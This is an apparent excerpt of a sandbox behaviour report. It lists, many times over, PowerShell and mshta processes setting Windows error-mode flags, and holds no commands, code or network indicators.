Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
